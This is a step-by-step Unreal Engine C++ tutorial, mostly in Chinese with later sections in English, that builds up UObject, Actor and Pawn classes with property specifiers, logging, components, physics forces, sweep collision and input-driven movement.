    ​编写 MyObject.h 的代码,给 MyObject 定义构造函数、float 类型变量 MyFloat 和函数 MyFunction(),并分别添加宏 UPROPERTY(BlueprintReadWrite) 与 UFUNCTION(BlueprintCallable),使得变量和函数能在蓝图类中读写/调用:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite)
    float MyFloat;

    UFUNCTION(BlueprintCallable)
    void MyFunction();
    };

    ​在 MyObject.cpp 里写实现(暂为空):

    #include "MyObject.h"

    UMyObject::UMyObject()
    {

    }

    void UMyObject::MyFunction()
    {

    }

    ​保存并编译。

    png

    ​此时在对应的蓝图中就可以创建相关的节点。

    png

    ​试一试!

    306-使用 UE_LOG 打印日志与在蓝图中实例化继承于 Object 的类

    ​修改 MyObject.h,宏中可以定义变量/函数属于哪个 Category

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite, Category = "My Variables")
    float MyFloat;

    UFUNCTION(BlueprintCallable, Category = "My Functions")
    void MyFunction();
    };

    MyObject.cpp 中写 MyFunction() 的实现,UE_LOG() 可以向控制台输出信息:

    #include "MyObject.h"

    UMyObject::UMyObject()
    {
    MyFloat = 0.0f;
    }

    void UMyObject::MyFunction()
    {
    UE_LOG(LogTemp, Log, TEXT("Hello World!"));
    UE_LOG(LogTemp, Warning, TEXT("Hello World!"));
    UE_LOG(LogTemp, Error, TEXT("Hello World!"));
    }

    png

    ​在关卡蓝图中,Construct Object from Class 可以将某个类实例化。
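
    ​在 C++ 里与之对应的是 NewObject(示意,假设在某个运行时函数中调用):

    // 蓝图节点 Construct Object from Class 的 C++ 对应写法
    UMyObject* MyObj = NewObject<UMyObject>();
    MyObj->MyFunction();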

    png

    ​这么画关卡蓝图,实例化 BP_MyObject 类,调用其中的 MyFunction()

    png

    ​开跑!此时就会在 OutputLog 里输出相应信息。

    307-如何删除自定义的 C++ 类

    401-创建自己的 Actor 子类与学习类的命名规范

    png

    ​创建一个 Actor 的 C++ class。

    png

    ​路径保持默认(源教程在 Path 里添油加醋了个 /Actor,结果我这里编译出错,好像不太聪明的样子……算了,我还是妥协好了;后来又想了想,可能要改一下 #include "MyActor.h" 的位置),之后创建好了 MyActor.h 和 MyActor.cpp。

    ​看一下 MyActor.cpp,感觉很像 Unity 里的 Start() 和 Update():

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    ​类的命名规范:

    • 派生自 Actor 的类带有 A 前缀,如 AController
    • 派生自 Object 的类带有 U 前缀,如 UComponent
    • Enums 的前缀是 E,如 EFortificationType
    • Interface 的前缀通常是 I,如 IAbilitySystemInterface
    • Template 的前缀是 T,如 TArray
    • 派生自 SWidget 的类 (Slate Ul) 带有前缀 S,如 SButton
    • 其他类的前缀为字母 F,如 FVector

    ​看一看 MyActor.h 里的内容,虽然 UCLASS() 没有 Blueprintable,但是也可以执行 Create Blueprint class based on MyActor,这是因为所继承的类 AActor 自带 Blueprintable:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    402-组件简介与使用蓝图类扩展代码的优点

    ​略。这个蓝图跟 Unity 里的 prefab 蛮像的。

    403-在 C++ 中创建静态网格组件

    ​编辑 MyActor.h 里的内容,声明一个变量 UStaticMeshComponent* MyStaticMesh

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​编辑 MyActor.cpp 里的内容,在构造函数里设置 MyStaticMesh 里的值:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​如此做,对应的蓝图里就会显示构造函数创建的 MyStaticMesh

    png

    ​也可以不用蓝图直接将定义的 C++ class 拖到关卡中。

    404-导入模型与布置场景

    ​略。

    405-使用 SetActorLocation 控制位置与宏参数 EditInstanceOnly 介绍

    修改 MyActor.h 的内容,添加一个 FVector 类型的变量 InitLocation,上面添加修饰宏 UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector"),让这个值可以在实例中编辑:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容,在 BeginPlay() 中将 Actor 的坐标设为 InitLocation 的值。

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​在蓝图实例中多了个设置 InitLocation 的地方,运行关卡会发现蓝图实例被正确地移动到了 InitLocation 的位置。

    406-VisibleInstanceOnly 与 EditDefaultsOnly

    ​修改 MyActor.h 里的内容,引入了两个新的宏参数:

    • VisibleInstanceOnly 只在实例中可见,不可编辑。
    • EditDefaultsOnly 只可在模板中编辑。

    ​给 bool 变量的命名加上前缀 b,UE 会自动识别并在面板显示时把前缀去除。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​开跑!可以看到宏参数 VisibleAnywhere、EditInstanceOnly、VisibleInstanceOnly、EditDefaultsOnly 之间的区别。

    407-VisibleDefaultsOnly 与 EditAnywhere

    ​修改 MyActor.h 的内容,引入了两个新的宏参数:

    • VisibleDefaultsOnly 只在模板中可见(没有地方可以编辑,一般没什么卵用)。
    • EditAnywhere 在模板类和实例类中均可编辑。
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    png

    ​开跑!此时实例会每帧沿方向 (0.1, 0.1, 0.1) 移动。

    408-在编辑器中限制输入值的范围与不要将组件指针设为 EditAnywhere

    不要将组件指针设为 EditAnywhere

    UPROPERTY(EditAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    不要这么做!生成的界面会十分复杂,不友好!


    ​修改 MyActor.h 里 TickLoactionOffset 的宏,如此做将在面板中限制变量的取值范围:

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    png

    409-简单碰撞与复杂碰撞

    ​教你认识 UE 里的碰撞,分为简单碰撞与复杂碰撞两种。

    png

    410-模拟物理与重力

    png

    ​物体中若打开了 Physics 下的 Simulate Physics,则会开启物理。

    png

    ​给这个物体加一个简单的凸包碰撞。

    png

    ​开跑!按下 `` ` `` 键可以打开命令行,输入 `show Collision` 即可在视图中显示碰撞的具体位置。

    411-通过代码增加力与力矩

    ​修改 MyActor.h 里的内容,添加了力 FVector InitForce、力矩 FVector InitTorque,以及“只改变加速度”(施加力/力矩时忽略质量)的开关 bAccelChange:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitForce;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitTorque;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    bool bAccelChange;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

​Modify MyActor.cpp as follows:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);   // NAME_None is the FName constant, not a string
MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange); // note: InitTorque here, not InitForce
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

MyStaticMesh-> members are not available by default; looking up UStaticMeshComponent in the official docs (UStaticMeshComponent | Unreal Engine 5.2 Documentation) shows that #include "Components/StaticMeshComponent.h" is required.

    png

​The initial force and torque applied to the object can now be set on each instance.

    png

412-Using Sweep to collide without simulating physics

​Without Simulate Physics, the default collision has no effect, but enabling Sweep makes collision work even when physics is not simulated.

    png

​Change the call in MyActor.cpp to AddActorLocalOffset(TickLoactionOffset, true); to get collision without using physics:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
//MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);
//MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset, true);
    }
    }

413-Collision channels and hit info

    png

The Collision settings control which collisions take effect; both sides must be set to Block for blocking to happen.


​Modify MyActor.cpp: declaring an FHitResult HitResult and calling AddActorLocalOffset(TickLoactionOffset, true, &HitResult); retrieves the hit info:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
//MyStaticMesh->AddForce(InitForce, NAME_None, bAccelChange);
//MyStaticMesh->AddTorque(InitTorque, NAME_None, bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    FHitResult HitResult;

    AddActorLocalOffset(TickLoactionOffset, true, &HitResult);
    UE_LOG(LogTemp, Warning, TEXT("X: %f, Y: %f, Z: %f"), HitResult.Location.X, HitResult.Location.Y, HitResult.Location.Z);
    }
    }

    png

​Hit Play! The Output Log prints the hit info. (A hedged extension is sketched below.)
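FHitResult carries more than the location; a small hedged extension of the Tick body above (FHitResult::GetActor() is the standard accessor) could also log what was hit:

if (bShouldMove)
{
    FHitResult HitResult;
    AddActorLocalOffset(TickLoactionOffset, true, &HitResult);
    if (HitResult.GetActor()) // valid only when the sweep actually hit something
    {
        UE_LOG(LogTemp, Warning, TEXT("Hit %s at X: %f, Y: %f, Z: %f"),
            *HitResult.GetActor()->GetName(),
            HitResult.Location.X, HitResult.Location.Y, HitResult.Location.Z);
    }
}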

414-Other common functions and areas to explore

​Omitted.

501-Creating your own Pawn class and root component, and attaching a static mesh component to it

    png

​Create a C++ Class of type Pawn to obtain MyPawn.h and MyPawn.cpp.

​Edit MyPawn.h and declare class UStaticMeshComponent* MyStaticMesh;. The leading class keyword (an inline forward declaration) is optional:

#pragma once

#include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;
};

​Edit MyPawn.cpp: assign RootComponent (the member comes with the template), create MyStaticMesh, and attach it under the root:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);
    }

​Compile, then Create Blueprint class based on MyPawn.

    png

​Hit Play!

    png

502-Adding a camera component to your Pawn

​Modify MyPawn.h, declaring a new member class UCameraComponent* MyCamera;:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    };

​Modify MyPawn.cpp, configuring MyCamera:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

​Hit Play!

    png

503-Setting up a GameMode and auto-possessing the Pawn

    png

​For GameModeBase under C++ Classes, create a game-mode blueprint via Create Blueprint class based on ....

    png

​In the new blueprint's Class Defaults, set Default Pawn Class to BP_MyPawn.

    png

​In the level's World Settings, set the GameMode Override.

    png

​In BP_MyPawn, set Auto Possess Player to Player 0, or modify MyPawn.cpp directly and add AutoPossessPlayer = EAutoReceiveInput::Player0;:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }
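As an aside (not from the course), the same default-pawn hookup can also be done in a C++ GameMode instead of the blueprint; a minimal sketch, assuming a hypothetical AGameModeBase subclass AMyGameMode:

#include "MyGameMode.h"
#include "MyPawn.h"

AMyGameMode::AMyGameMode()
{
    // DefaultPawnClass is the standard AGameModeBase member the blueprint edits.
    DefaultPawnClass = AMyPawn::StaticClass();
}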

504-Key mappings and axis-event bindings

    png

​Set up the key mappings in Project Settings.

​Define private movement functions in MyPawn.h:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    };

​Bind the key mappings to axis events in MyPawn.cpp:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    }

    void AMyPawn::MoveRight(float Value)
    {
    }

505-Movement via Tick

​Modify MyPawn.h, defining the variables MaxSpeed and Velocity:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

​Modify MyPawn.cpp so that the pawn moves with the input:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

